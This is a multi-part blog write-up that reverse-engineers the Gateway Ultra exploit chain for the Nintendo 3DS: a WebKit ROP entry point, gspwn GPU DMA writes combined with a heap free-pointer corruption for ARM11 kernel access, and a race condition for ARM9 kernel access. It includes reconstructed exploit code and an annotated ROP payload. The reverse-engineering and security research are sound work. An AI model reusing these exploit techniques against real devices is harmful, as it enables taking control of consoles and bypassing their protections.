Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionalities are handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor with privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically there are a couple of things that I do not know if it is done for the sake of the exploit or if it is done purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.


For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot

// not called directly, offset determines jump
void jump_table(void)

void func_patch_hook(void)
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}")
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_send(pxi_regs, 0x10000);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0", func_hook_return);

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI and is used to pass data to and from each processor. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0×08000000 to 0×081000000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only performs a one-to-one virtual memory addressing (aka physical addresses and virtual addresses are the same) but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it makes patches to two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early-on. Second, it patches the function at 0xFFFF097C (I believe this function is ran after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time in the ARM9 processor, Process9 now waits for a special command, 0×44836 from PXI, in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series to commands to put Process9 into function 0x0807B97C, however that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0×24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0×08000000-0×08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.


I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0×10000 through PXI and what does PDN register 0×230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see the exploit triggered and code to run, the actual exploit itself was not as clear. I looked at all the function calls made and made a couple of hypothesis of where the vulnerability resided, and reversed each function to the end to test my hypothesis. Although there was many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.


As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode including parts that are irrelevant either because it is used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
    unsigned int result;

        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;

arm11_kernel_exploit_setup (void)
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
        model = ipc_buf[2] & 0xFF;
        model = -1;
    *(int *)0x8F01028 = model;

    return 0;

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfusction.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");


The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0×20000000 to 0×28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0×00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that it’s physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, writing to 0xEFF80000 will allow you to execute the code at 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which performs the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two free blocks will be combined to form a larger free block (and the pointers to and from it is updated accordantly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, we can with gspwn, so we overwrite the free pointer with gspwn to overwrite the code in the 0xEFF80000 region. And that is possible because the pointer dereference is done with kernel permissions because the pointers stored here is not normally user accessible.

The data stored in the freed region is as follows:

    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
} free_data;

When the first ControlMemory call happens in the exploit, it frees FCRAM 0×24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0×24450000). This will coalesce the block with

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0×24451000 and therefore control the write.

… But we’re not done yet. The above pseudocode was an artist rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual address 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, it is 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example), however, 0xF4450000 assembles to “vst4.8{d16-d19}, [r5], r0″ (don’t worry, I don’t know what that is either) and 0xE4450000 assembles to “strb r0, [r5], #-0″. Both of which can’t be used (obviously) to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to compile to a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enabled called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 bytes arbitrary to any address including something like “0×1003″. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0×20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0×18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.


Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.


Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
        memcpy (data, 0x08F028D8, 0x44);
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
        memcpy (data, 0x08F0291C, 0x44);
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
        memcpy (data, 0x08F02960, 0x44);
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
        memcpy (data, 0x08F029A4, 0x44);
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
        memcpy (data, 0x08F029E8, 0x44);
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
        memcpy (data, 0x08F02A2C, 0x44);
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
        memcpy (data, 0x08F02A70, 0x44);
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
        memcpy (data, 0x08F02AB4, 0x44);

    // part 3, execute code
        // if the function has it's original code, we try again
        code_not_copied = *(unsigned int *)data->payload_code + data->orig_code == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    (void(*)() 0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason


The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that is it in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0×08000838 to some location in the payload that is filled with “0x002CAFE4″. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache needs some time to see the changes that it did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code are useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) set flags, or 4) function call. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.


The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only difference in the different payloads are memory offsets).


This is what the initial first stage payload does:

void *_this = 0x08F10000;
int *read_len = 0x08F10020;
int *buffer = 0x08F01000;
int state = 0;
int i = 0;
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
    state += 0xD5828281;
    buffer[i] += state;

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).


The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.


For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
